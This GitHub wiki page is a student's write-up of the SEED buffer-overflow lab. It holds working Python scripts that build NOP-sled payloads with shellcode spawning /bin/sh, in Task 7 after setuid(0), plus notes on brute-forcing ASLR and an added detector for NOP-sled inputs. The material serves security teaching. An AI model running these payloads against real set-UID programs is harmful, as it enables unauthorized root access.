LAB-11 - Buffer-Overflow Attack Lab (Set-UID Version) - archie-archana/securecodinglab GitHub Wiki

2.1 Turning Off Countermeasures

Address randomization: the system uses address space layout randomization (ASLR) to randomize the starting addresses of the heap and the stack. This makes guessing the exact addresses difficult, and guessing addresses is one of the critical steps of a buffer-overflow attack.


Task 3: Launching Attack on 32-bit Program

5.1 Investigation

**First breakpoint**

5.2 Launching Attacks


Task 4: Launching Attack without Knowing Buffer Size (Level 2)


Task 5

```python
#!/usr/bin/python3
import sys

# Replace this with the actual shellcode
shellcode = (
    b"\x90\x90\x90\x90"
    + b"\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e"
      b"\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57"
      b"\x48\x89\xe6\x48\x31\xc0\xb0\x3b\x0f\x05"
)  # replace with your shellcode

# Fill the content with NOP's
content = bytearray(0x90 for i in range(517))

# Put the shellcode somewhere in the payload
start = 100  # Adjust this to the desired position in the payload
content[start:start + len(shellcode)] = shellcode

# Decide the return address value and put it somewhere in the payload
ret = 0x7fffffffd8c0  # Replace with the actual target return address
offset = 216          # Adjust this to the desired offset within the payload
L = 8                 # Use 4 for 32-bit address and 8 for 64-bit address

# Convert the return address to bytes and write it to the payload
content[offset:offset + L] = ret.to_bytes(L, byteorder='little')

# Print the payload
sys.stdout.buffer.write(content)
```


Task 7: Defeating dash's Countermeasure

```python
#!/usr/bin/python3
import sys

# Replace the content with the actual shellcode
shellcode = (
    "\x31\xdb\x31\xc0\xb0\xd5\xcd\x80"
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
    "\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"
    "\xd2\x31\xc0\xb0\x0b\xcd\x80"
).encode('latin-1')

# Fill the content with NOP's
content = bytearray(0x90 for i in range(517))

##################################################################
# Put the shellcode somewhere in the payload
start = 400  # Change this number
content[start:start + len(shellcode)] = shellcode

# Decide the return address value
# and put it somewhere in the payload
ret = 0xffffcab8 + 200  # Change this number
offset = 112            # Change this number

L = 4  # Use 4 for 32-bit address and 8 for 64-bit address
content[offset:offset + L] = (ret).to_bytes(L, byteorder='little')
##################################################################

# Write the content to a file
with open('badfile', 'wb') as f:
    f.write(content)
```
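As an added defensive counterpart to the two payload-building scripts above (this is not code from the writeup or from the SEED lab), here is a small detector that flags inputs padded with long runs of 0x90, the NOP-sled shape both scripts produce. The 517-byte sample it scans is constructed here with placeholder bytes in place of shellcode, and the thresholds (`min_len`, `min_fraction`) are assumed values.

```python
#!/usr/bin/python3
# Added example: flag untrusted input that looks like a NOP-sled payload.
# The scripts above pad a 517-byte file with 0x90 so that an imprecise return
# address still "slides" into the shellcode; a long run of 0x90 in a file or
# network input is therefore a cheap, classic IDS/DFIR signature for this class.
NOP = 0x90

def nop_runs(data, min_len=32):
    """Return (offset, length) for every run of 0x90 at least min_len bytes long."""
    runs = []
    start = None
    for i, b in enumerate(data):
        if b == NOP:
            if start is None:
                start = i
        elif start is not None:
            if i - start >= min_len:
                runs.append((start, i - start))
            start = None
    if start is not None and len(data) - start >= min_len:
        runs.append((start, len(data) - start))
    return runs

def looks_like_sled_payload(data, min_len=32, min_fraction=0.5):
    """True when at least one run qualifies and 0x90 dominates the whole input."""
    runs = nop_runs(data, min_len)
    return bool(runs) and data.count(NOP) / max(len(data), 1) >= min_fraction

# Constructed sample (same layout as the Task 5 payload, but an opaque 20-byte
# placeholder blob stands in for shellcode at offset 100, and the 8-byte
# little-endian address from that script sits at offset 216).
sample = bytearray([NOP] * 517)
sample[100:120] = bytes(range(1, 21))
sample[216:224] = (0x7fffffffd8c0).to_bytes(8, byteorder='little')

if __name__ == "__main__":
    for off, length in nop_runs(sample):
        print(f"NOP run at offset {off}, length {length}")
    print("suspicious:", looks_like_sled_payload(sample))
```

Runs shorter than `min_len` are ignored so that ordinary binaries containing a few alignment NOPs do not trip the check; tune both thresholds against benign samples before using this on real traffic.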


Task 8: Defeating Address Randomization

On 32-bit Linux machines, stacks only have 19 bits of entropy, which means the stack base address can have 2^19 = 524,288 possibilities. This number is not that high and can be exhausted easily with a brute-force approach.
